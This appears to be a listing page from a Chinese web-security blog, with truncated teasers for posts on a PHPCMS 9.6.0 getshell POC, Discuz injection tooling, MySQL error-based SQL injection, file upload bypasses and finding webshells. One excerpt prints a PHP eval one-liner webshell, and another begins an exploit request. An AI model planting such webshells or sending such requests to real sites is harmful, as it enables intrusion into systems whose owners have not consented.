PHPCMS_V9.6.0 前台GETSHELL 04月27日

0x00 POC url: /index.php?m=member&c=index&a=register&siteid=1 post数据:siteid=1&modelid=11&username=abcd&password=123456&em...

搜索需求挖掘,推广词库收集整理 03月27日

1、找准词根 2、垂直挖掘关键词 3、挖掘相关关键词 4、关键词清洗 5、关键词分类整理 1、找准词根 词根来源: 1、竞价账户产生询盘的关键词 2、竞价账户产生询盘的...

【漏洞提交】文件上传漏洞演示脚本之js验证 03月22日

关于文件上传漏洞,想必玩web安全的同学们都有接触,之前本站也发布过一篇文章介绍文件上传漏洞的各种绕过方法,但是只是有文档却没有演示代码,最近给公司一客户培训...

【漏洞扫描工具】小龙web漏洞扫描器V1.0 03月22日

今天在群里偶得一神器,测试之,异常之强大,而且工具非常简洁,菜鸟也能使用,共享给大家玩玩。 神器介绍: 神器名称:小龙web漏洞扫描器V1.0 神器作者:小龙 QQ号:...

播布客培训视频免费下载 03月22日

为了造福社会,帮助更多穷人掌握高端实用技术,找到理想工作,过上富足安康的生活,著名教育视频网站播布客在2013年年底开始倒箱底啦! 截止到2013年年底之前的所有培...

Discuz 7.2 faq.php 注入漏洞全自动利用工具 03月22日

之前小站发布了discuz 7.2 faq.php注入漏洞的分析文章,但是空有分析,没有合适的工作怎么行? 还好网上有大牛已经写好了工具了,我们拿来用即可。。。 Discuz 7.2 fa...

【李炎恢php第二季】李炎恢PHP视频教程 03月22日

前言 好久没有发好视频给大家了,主要是太忙没有时间做,分享一些个好的资源给大家吧。 搞渗透测试的时间长了都知道,想做的深入不了解一些web编程知识是不行的,所以...

查找.NET网站数据库连接信息 03月22日

相信N多菜菜在测试.NET网站的时候都会遇到拿到了shell却找不到数据库连接密码的情况,还好乌云的大牛给我们科普了一下这方面的知识,本文转过来分享给大家,原文名称...

【黑客游戏】超级黑客闯关游戏过关攻略 03月22日

今天上了一下博客,看到有朋友在问我关于这个超级黑客闯关游戏最后一关的答案,这个游戏我之前也没有玩过,于是乎去玩了一下,现把攻略分享给大家。。 游戏地址: htt...

【sql注入】MySQL暴错注入方法整理 03月22日

mysql暴错注入方法整理,通过floor,UpdateXml,ExtractValue,NAME_CONST,Error based Double Query Injection等方法 1、通过floor暴错 /*数据库版本*/ http://www...

国产WEB漏洞测试平台—MST 03月22日

介绍 Mst是一款Python2.7编写的小漏洞利用平台,可运行在windows | Backtrack | maxosx 等系统,专注于web漏洞的测试和各种利用插件的编写。 不懂怎么介绍,来看下截...

【webshell】linux查找webshell 03月22日

首先认识一下小马,一般大马容易暴露,骇客都会留一手,把小马加入正常PHP文件里面 <?php eval ($_POST[a]);?> //密码为a,使用中国菜刀连接 隐藏很深的小马 fp...

【wooyun.org】手把手教你“复活”乌云网 03月22日

从乌云网升级说起 本人刚踏入安全圈不久,在学习的过程中除了阅读一些经典书籍外,像安全客、乌云网、Freebuf等网站也是我光顾最多的地方。在7月初,我有幸参加了今年...

【旁注】安全盒子C段旁注工具第二版 03月22日

安全盒子C段旁注工具是由安全盒子安全团队(www.secbox.cn)用JAVA开发的一款C段旁注查询的工具,多个接口,查询速度快。 运行环境: JRE6(java runtime environment...

loading